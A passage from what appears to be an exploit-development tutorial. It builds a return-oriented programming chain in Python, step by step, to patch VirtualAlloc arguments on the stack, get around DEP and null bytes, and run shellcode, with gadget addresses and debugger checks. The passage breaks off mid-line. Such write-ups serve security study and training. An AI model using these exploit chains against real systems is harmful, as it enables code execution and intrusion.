rop_chain += pack("<L", (0x10049875)) # mov dword [esi], eax ; pop esi ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into esi

NOTE: It was not possible to perform the exact calculation of where the shellcode would start because our ROP chain wasn’t complete yet. I just used the value 0x180 that I could later update once the chain was complete.
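The “subtract a negative value” step used above can be modelled with plain 32-bit arithmetic. This is a sketch only: sub32 is a hypothetical helper name, and the EAX value is an invented stack address, not one taken from the debugging session.

```python
MASK32 = 0xFFFFFFFF  # results are truncated to 32 bits, as in a register

def sub32(eax, ecx):
    """Model 'sub eax, ecx' on 32-bit registers (hypothetical helper)."""
    return (eax - ecx) & MASK32

ecx = 0xfffffe80    # -0x180 as a 32-bit value, as popped into ECX by the chain
eax = 0x0014c500    # illustrative address only

# Subtracting -0x180 is the same as adding 0x180.
print(hex(sub32(eax, ecx)))  # 0x14c680
```

Once the chain is complete, only the constant popped into ECX needs to change to reflect the real distance to the shellcode.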

After re-launching the new exploit and stepping through the newly added ROP gadgets, EAX was pointing to our shellcode placeholder values (0x45454545) on the stack.

These values were part of the buffer that we sent in the Python exploit. The placeholder values would be later updated with the actual shellcode.

After having EAX point to the shellcode address, we then move its value into the address that ESI is pointing to (0x46464646).

We have successfully patched the second placeholder value with our return address.

Step 7: Updating the lpAddress argument in VirtualAlloc

The first argument that VirtualAlloc expects is the address that needs to have its permissions changed. In this case it will be the same address that we return to after the API call. Our next placeholder value that we need to patch with lpAddress (the shellcode address) is 0x47474747. We can use the same ROP gadgets that we used to patch the return address. The only difference is the bigger offset: we now need to add -0x98 to EAX (i.e. subtract 0x98) because of the additional ROP gadgets we have added on the stack. The exact lpAddress isn’t known to us at this stage because the ROP chain is incomplete, so we add the value 0x180 to EAX temporarily.

rop_chain += pack("<L", (0x10038f84)) # push esp ; and al, 0x10 ; pop esi ; mov dword [edx], eax ; mov eax, 0x00000001 ; ret  ;
rop_chain += pack("<L", (0x10022973)) # mov eax, esi ; pop esi ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into esi
rop_chain += pack("<L", (0x1003985f)) # pop ecx ; ret  ;
rop_chain += pack("<L", (0xffffff68)) # -0x98
rop_chain += pack("<L", (0x1001465e)) # add eax, ecx ; ret  ;
rop_chain += pack("<L", (0x10040754)) # push eax ; pop esi ; pop ebp ; lea eax, dword [ecx+eax+0x0D] ; pop ebx ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into ebp
rop_chain += pack("<L", (0x42424242)) # junk value into ebx
rop_chain += pack("<L", (0x100122bb)) # push esi ; add al, 0x5E ; pop ebx ; ret  ;
rop_chain += pack("<L", (0x1001ce45)) # mov eax, ebx ; pop ebp ; pop ebx ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into ebp
rop_chain += pack("<L", (0x42424242)) # junk value into ebx
rop_chain += pack("<L", (0x1003985f)) # pop ecx ; ret  ;
rop_chain += pack("<L", (0xfffffe80)) # -0x180
rop_chain += pack("<L", (0x1002c9a4)) # sub eax, ecx ; ret  ;
rop_chain += pack("<L", (0x10049875)) # mov dword [esi], eax ; pop esi ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into esi

The final gadget writes the shellcode address to the address that ESI is pointing to, and we now have 3 values updated for our VirtualAlloc call, as can be seen below.

Step 8: Updating the dwSize argument in VirtualAlloc

The next argument we need to update is dwSize that defines the size of the memory page region that will need to have its permissions changed. We can set the size to 0x1, which will apply the permissions to the entire memory page.
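The reason a size of 0x1 is enough is that the permissions are applied to every page containing at least one byte of the requested range. The sketch below illustrates that rounding, assuming the usual 4 KB page size on x86 Windows; page_span is a hypothetical helper and the address is only an example stack address.

```python
PAGE_SIZE = 0x1000  # assumption: 4 KB pages

def page_span(address, size, page_size=PAGE_SIZE):
    """Return (start, end) of the whole pages covering [address, address + size)."""
    start = address & ~(page_size - 1)                          # round down to a page boundary
    end = (address + size + page_size - 1) & ~(page_size - 1)   # round up to a page boundary
    return start, end

start, end = page_span(0x0014c480, 0x1)
print(hex(start), hex(end))  # 0x14c000 0x14d000
```

Note that a single page is only sufficient as long as the shellcode does not extend past the end of that page.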

We have to avoid the null byte issue here as well: we cannot just place the value 0x1 in the chain, because the remaining bytes of the 0x00000001 DWORD would be filled with 0x00. Instead, we can use the NEG instruction, which is the same as subtracting a value from 0. So if we subtract 0xffffffff from 0, we get 0x1, which is created dynamically at run time and avoids the null byte issue.
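The effect of NEG on 0xffffffff can be verified with a couple of lines of 32-bit arithmetic. This is a minimal sketch; neg32 is a hypothetical helper that models the instruction, not part of the exploit.

```python
import struct

MASK32 = 0xFFFFFFFF  # truncate to a 32-bit register

def neg32(value):
    """Model 'neg eax': subtract the value from 0 and keep the low 32 bits."""
    return (0 - value) & MASK32

popped = 0xffffffff  # the value placed in the chain

print(b"\x00" in struct.pack("<L", popped))  # False: safe to send
print(hex(neg32(popped)))                    # 0x1
```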

The first part of the ROP chain below is the same as the previous ones we used to make ESI point to the placeholder value (0x48484848 in this case). We then pop the value 0xffffffff into EAX and use the NEG instruction on it, which subtracts 0xffffffff from 0 and makes EAX equal to 0x1. EAX is then written to the address pointed to by ESI.

rop_chain += pack("<L", (0x10038f84)) # push esp ; and al, 0x10 ; pop esi ; mov dword [edx], eax ; mov eax, 0x00000001 ; ret  ;
rop_chain += pack("<L", (0x10022973)) # mov eax, esi ; pop esi ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into esi
rop_chain += pack("<L", (0x1003985f)) # pop ecx ; ret  ;
rop_chain += pack("<L", (0xffffff24)) # -0xdc
rop_chain += pack("<L", (0x1001465e)) # add eax, ecx ; ret  ;
rop_chain += pack("<L", (0x10040754)) # push eax ; pop esi ; pop ebp ; lea eax, dword [ecx+eax+0x0D] ; pop ebx ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into ebp
rop_chain += pack("<L", (0x42424242)) # junk value into ebx
rop_chain += pack("<L", (0x1002a779)) # pop eax ; ret  ;
rop_chain += pack("<L", (0xffffffff)) # -1 to be NEGated
rop_chain += pack("<L", (0x1004d1c4)) # neg eax ; pop ebx ; ret ;
rop_chain += pack("<L", (0x42424242)) # junk value into ebx
rop_chain += pack("<L", (0x10049875)) # mov dword [esi], eax ; pop esi ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into esi

After having updated the exploit with the above ROP chain, we can see that ESI is pointing to the address that has 0x1 in it.

Step 9: Updating the flAllocationType argument in VirtualAlloc

The next argument we need to update is flAllocationType, which defines the type of memory allocation. We will need to set its value to 0x1000, which is MEM_COMMIT. This is because we will be updating the already reserved memory on the stack that contains our shellcode. If we were to create a newly allocated memory region, we would need to use MEM_COMMIT | MEM_RESERVE, which would be equal to 0x3000. In our case we are using VirtualAlloc as if it were VirtualProtect: we are not reserving a new memory region, only updating the already existing one on the stack.
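The flag values mentioned above can be written out as constants. The short sketch below uses the documented Windows values for MEM_COMMIT and MEM_RESERVE and shows how MEM_COMMIT looks once packed as a little-endian DWORD.

```python
import struct

MEM_COMMIT = 0x1000   # documented Windows constant
MEM_RESERVE = 0x2000  # documented Windows constant

combined = MEM_COMMIT | MEM_RESERVE
print(hex(combined))                  # 0x3000

packed = struct.pack("<L", MEM_COMMIT)
print(packed)                         # b'\x00\x10\x00\x00'
print(packed.count(b"\x00"))          # 3 null bytes out of 4
```

Three of the four packed bytes are 0x00, so the value cannot be placed in the buffer as-is.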

Avoiding the null byte issue also has to be considered here. We cannot just move the value 0x1000 into the next placeholder address, because the packed DWORD 0x00001000 contains null bytes. Instead, we can add two large null-free values whose sum wraps around to 0x1000.

When the two values are added together, the result overflows the 32-bit register and the carry is discarded, leaving 0x1000 (0x88888888 + 0x77778778 = 0x100001000, which truncates to 0x00001000). The above calculation in WinDBG demonstrates how those two exact values were obtained.
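The same calculation can be reproduced in Python instead of WinDBG. The following is a sketch under the assumption that the first operand is chosen freely (0x88888888 here); add32 and complement_for are hypothetical helper names.

```python
import struct

MASK32 = 0xFFFFFFFF  # truncate to a 32-bit register

def add32(a, b):
    """Model 'add eax, ecx' with 32-bit wraparound."""
    return (a + b) & MASK32

def complement_for(target, first):
    """Return the value that, added to first, wraps around to target."""
    return (target - first) & MASK32

first = 0x88888888
second = complement_for(0x1000, first)

print(hex(second))                # 0x77778778
print(hex(add32(first, second)))  # 0x1000
print(any(b"\x00" in struct.pack("<L", v) for v in (first, second)))  # False
```

If a chosen first operand yields a second operand containing a null byte, a different first operand has to be picked.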

rop_chain += pack("<L", (0x10038f84)) # push esp ; and al, 0x10 ; pop esi ; mov dword [edx], eax ; mov eax, 0x00000001 ; ret  ;
rop_chain += pack("<L", (0x10022973)) # mov eax, esi ; pop esi ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into esi
rop_chain += pack("<L", (0x1003985f)) # pop ecx ; ret  ;
rop_chain += pack("<L", (0xfffffeec)) # -0x114
rop_chain += pack("<L", (0x1001465e)) # add eax, ecx ; ret  ;
rop_chain += pack("<L", (0x10040754)) # push eax ; pop esi ; pop ebp ; lea eax, dword [ecx+eax+0x0D] ; pop ebx ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into ebp
rop_chain += pack("<L", (0x42424242)) # junk value into ebx
rop_chain += pack("<L", (0x1002a779)) # pop eax ; ret  ;
rop_chain += pack("<L", (0x88888888)) # the first value to be added
rop_chain += pack("<L", (0x1003985f)) # pop ecx ; ret  ;
rop_chain += pack("<L", (0x77778778)) # the second value to be added
rop_chain += pack